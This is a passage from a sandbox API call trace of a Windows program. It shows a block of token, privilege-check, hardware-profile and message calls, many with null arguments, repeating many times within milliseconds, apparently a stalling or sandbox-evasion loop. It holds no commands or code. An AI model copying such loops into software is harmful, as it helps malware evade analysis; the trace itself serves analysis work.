pHWProfileInfo=0x0) returned 0x3 [0085.130] GetPriorityClass (hProcess=0x0) returned 0x0 [0085.131] GetCurrentThread () returned 0xfffffffe [0085.131] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0085.131] GetLastError () returned 0x3f0 [0085.131] GetCurrentProcess () returned 0xffffffff [0085.131] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0085.131] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0085.131] SetLastError (dwErrCode=0x522) [0085.131] CloseHandle (hObject=0x114) returned 1 [0085.131] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0085.131] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0085.131] GetLastError () returned 0x578 [0085.131] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0085.131] GetPriorityClass (hProcess=0x0) returned 0x0 [0085.131] GetCurrentThread () returned 0xfffffffe [0085.131] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0085.131] GetLastError () returned 0x3f0 [0085.131] GetCurrentProcess () returned 0xffffffff [0085.131] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0085.131] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0085.131] SetLastError (dwErrCode=0x522) [0085.131] CloseHandle (hObject=0x114) returned 1 [0085.131] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0085.131] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0085.131] GetLastError () returned 0x578 [0085.131] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0085.131] GetPriorityClass (hProcess=0x0) returned 0x0 [0085.131] GetCurrentThread () returned 0xfffffffe [0085.131] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0085.131] GetLastError () returned 0x3f0 [0085.131] GetCurrentProcess () returned 0xffffffff [0085.131] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0085.131] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0085.131] SetLastError (dwErrCode=0x522) [0085.131] CloseHandle (hObject=0x114) returned 1 [0085.131] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0085.131] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0085.131] GetLastError () returned 0x578 [0085.131] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0085.131] GetPriorityClass (hProcess=0x0) returned 0x0 [0085.131] GetCurrentThread () returned 0xfffffffe [0085.131] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0085.131] GetLastError () returned 0x3f0 [0085.131] GetCurrentProcess () returned 0xffffffff [0085.131] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0085.131] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0085.131] SetLastError (dwErrCode=0x522) [0085.131] CloseHandle (hObject=0x114) returned 1 [0085.132] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0085.132] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0085.132] GetLastError () returned 0x578 [0085.132] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0085.132] GetPriorityClass (hProcess=0x0) returned 0x0 [0085.132] GetCurrentThread () returned 0xfffffffe [0085.132] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0085.132] GetLastError () returned 0x3f0 [0085.132] GetCurrentProcess () returned 0xffffffff [0085.132] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0085.132] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0085.132] SetLastError (dwErrCode=0x522) [0085.132] CloseHandle (hObject=0x114) returned 1 [0085.132] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0085.132] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0085.132] GetLastError () returned 0x578 [0085.132] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0085.132] GetPriorityClass (hProcess=0x0) returned 0x0 [0085.132] GetCurrentThread () returned 0xfffffffe [0085.132] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0085.132] GetLastError () returned 0x3f0 [0085.132] GetCurrentProcess () returned 0xffffffff [0085.132] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0085.132] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0085.132] SetLastError (dwErrCode=0x522) [0085.132] CloseHandle (hObject=0x114) returned 1 [0085.132] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0085.132] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0085.132] GetLastError () returned 0x578 [0085.132] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0085.132] GetPriorityClass (hProcess=0x0) returned 0x0 [0085.132] GetCurrentThread () returned 0xfffffffe [0085.132] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0085.132] GetLastError () returned 0x3f0 [0085.132] GetCurrentProcess () returned 0xffffffff [0085.132] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0085.132] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0085.132] SetLastError (dwErrCode=0x522) [0085.132] CloseHandle (hObject=0x114) returned 1 [0085.132] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0085.132] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0085.132] GetLastError () returned 0x578 [0085.132] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0085.132] GetPriorityClass (hProcess=0x0) returned 0x0 [0085.132] GetCurrentThread () returned 0xfffffffe [0085.132] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0085.133] GetLastError () returned 0x3f0 [0085.133] GetCurrentProcess () returned 0xffffffff [0085.133] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0085.133] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0085.133] SetLastError (dwErrCode=0x522) [0085.133] CloseHandle (hObject=0x114) returned 1 [0085.133] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0085.133] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0085.133] GetLastError () returned 0x578 [0085.133] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0085.133] GetPriorityClass (hProcess=0x0) returned 0x0 [0085.133] GetCurrentThread () returned 0xfffffffe [0085.133] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0085.133] GetLastError () returned 0x3f0 [0085.133] GetCurrentProcess () returned 0xffffffff [0085.133] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0085.133] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0085.133] SetLastError (dwErrCode=0x522) [0085.133] CloseHandle (hObject=0x114) returned 1 [0085.133] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0085.133] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0085.133] GetLastError () returned 0x578 [0085.133] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0085.133] GetPriorityClass (hProcess=0x0) returned 0x0 [0085.133] GetCurrentThread () returned 0xfffffffe [0085.133] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0085.133] GetLastError () returned 0x3f0 [0085.133] GetCurrentProcess () returned 0xffffffff [0085.133] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0085.133] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0085.133] SetLastError (dwErrCode=0x522) [0085.133] CloseHandle (hObject=0x114) returned 1 [0085.133] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0085.133] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0085.133] GetLastError () returned 0x578 [0085.133] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0085.133] GetPriorityClass (hProcess=0x0) returned 0x0 [0085.133] GetCurrentThread () returned 0xfffffffe [0085.133] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0085.133] GetLastError () returned 0x3f0 [0085.133] GetCurrentProcess () returned 0xffffffff [0085.133] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0085.133] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0085.133] SetLastError (dwErrCode=0x522) [0085.133] CloseHandle (hObject=0x114) returned 1 [0085.133] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0085.133] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0085.134] GetLastError () returned 0x578 [0085.134] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0085.134] GetPriorityClass (hProcess=0x0) returned 0x0 [0085.134] GetCurrentThread () returned 0xfffffffe [0085.134] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0085.134] GetLastError () returned 0x3f0 [0085.134] GetCurrentProcess () returned 0xffffffff [0085.134] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0085.134] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0085.134] SetLastError (dwErrCode=0x522) [0085.134] CloseHandle (hObject=0x114) returned 1 [0085.134] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0085.134] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0085.134] GetLastError () returned 0x578 [0085.134] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0085.134] GetPriorityClass (hProcess=0x0) returned 0x0 [0085.134] GetCurrentThread () returned 0xfffffffe [0085.134] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0085.134] GetLastError () returned 0x3f0 [0085.134] GetCurrentProcess () returned 0xffffffff [0085.134] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0085.134] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0085.134] SetLastError (dwErrCode=0x522) [0085.134] CloseHandle (hObject=0x114) returned 1 [0085.134] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0085.134] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0085.134] GetLastError () returned 0x578 [0085.134] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0085.134] GetPriorityClass (hProcess=0x0) returned 0x0 [0085.134] GetCurrentThread () returned 0xfffffffe [0085.134] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0085.134] GetLastError () returned 0x3f0 [0085.134] GetCurrentProcess () returned 0xffffffff [0085.134] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0085.134] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0085.134] SetLastError (dwErrCode=0x522) [0085.134] CloseHandle (hObject=0x114) returned 1 [0085.134] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0085.134] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0085.134] GetLastError () returned 0x578 [0085.134] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0085.134] GetPriorityClass (hProcess=0x0) returned 0x0 [0085.134] GetCurrentThread () returned 0xfffffffe [0085.134] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0085.134] GetLastError () returned 0x3f0 [0085.134] GetCurrentProcess () returned 0xffffffff [0085.134] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0085.135] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0085.135] SetLastError (dwErrCode=0x522) [0085.135] CloseHandle (hObject=0x114) returned 1 [0085.135] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0085.135] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0085.135] GetLastError () returned 0x578 [0085.135] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0085.135] GetPriorityClass (hProcess=0x0) returned 0x0 [0085.135] GetCurrentThread () returned 0xfffffffe [0085.135] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0085.135] GetLastError () returned 0x3f0 [0085.135] GetCurrentProcess () returned 0xffffffff [0085.135] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0085.135] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0085.135] SetLastError (dwErrCode=0x522) [0085.135] CloseHandle (hObject=0x114) returned 1 [0085.135] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0085.135] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0085.135] GetLastError () returned 0x578 [0085.135] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0085.135] GetPriorityClass (hProcess=0x0) returned 0x0 [0085.135] GetCurrentThread () returned 0xfffffffe [0085.135] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0085.135] GetLastError () returned 0x3f0 [0085.135] GetCurrentProcess () returned 0xffffffff [0085.135] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0085.135] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0085.135] SetLastError (dwErrCode=0x522) [0085.135] CloseHandle (hObject=0x114) returned 1 [0085.135] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0085.135] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0085.135] GetLastError () returned 0x578 [0085.135] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0085.135] GetPriorityClass (hProcess=0x0) returned 0x0 [0085.135] GetCurrentThread () returned 0xfffffffe [0085.135] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0085.135] GetLastError () returned 0x3f0 [0085.135] GetCurrentProcess () returned 0xffffffff [0085.135] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0085.135] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0085.135] SetLastError (dwErrCode=0x522) [0085.135] CloseHandle (hObject=0x114) returned 1 [0085.135] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0085.135] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0085.135] GetLastError () returned 0x578 [0085.135] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0085.135] GetPriorityClass (hProcess=0x0) returned 0x0 [0085.136] GetCurrentThread () returned 0xfffffffe [0085.136] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0085.136] GetLastError () returned 0x3f0 [0085.136] GetCurrentProcess () returned 0xffffffff [0085.136] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0085.136] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0085.136] SetLastError (dwErrCode=0x522) [0085.136] CloseHandle (hObject=0x114) returned 1 [0085.136] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0085.136] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0085.136] GetLastError () returned 0x578 [0085.136] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0085.136] GetPriorityClass (hProcess=0x0) returned 0x0 [0085.136] GetCurrentThread () returned 0xfffffffe [0085.136] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0085.136] GetLastError () returned 0x3f0 [0085.136] GetCurrentProcess () returned 0xffffffff [0085.136] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0085.136] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0085.136] SetLastError (dwErrCode=0x522) [0085.136] CloseHandle (hObject=0x114) returned 1 [0085.136] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0085.136] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0085.136] GetLastError () returned 0x578 [0085.136] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0085.136] GetPriorityClass (hProcess=0x0) returned 0x0 [0085.136] GetCurrentThread () returned 0xfffffffe [0085.136] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0085.136] GetLastError () returned 0x3f0 [0085.136] GetCurrentProcess () returned 0xffffffff [0085.136] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0085.136] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0085.136] SetLastError (dwErrCode=0x522) [0085.136] CloseHandle (hObject=0x114) returned 1 [0085.136] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0085.136] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0085.136] GetLastError () returned 0x578 [0085.136] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0085.136] GetPriorityClass (hProcess=0x0) returned 0x0 [0085.136] GetCurrentThread () returned 0xfffffffe [0085.136] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0085.136] GetLastError () returned 0x3f0 [0085.136] GetCurrentProcess () returned 0xffffffff [0085.136] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0085.136] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0085.136] SetLastError (dwErrCode=0x522) [0085.137] CloseHandle (hObject=0x114) returned 1 [0085.137] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0085.137] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0085.137] GetLastError () returned 0x578 [0085.137] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, 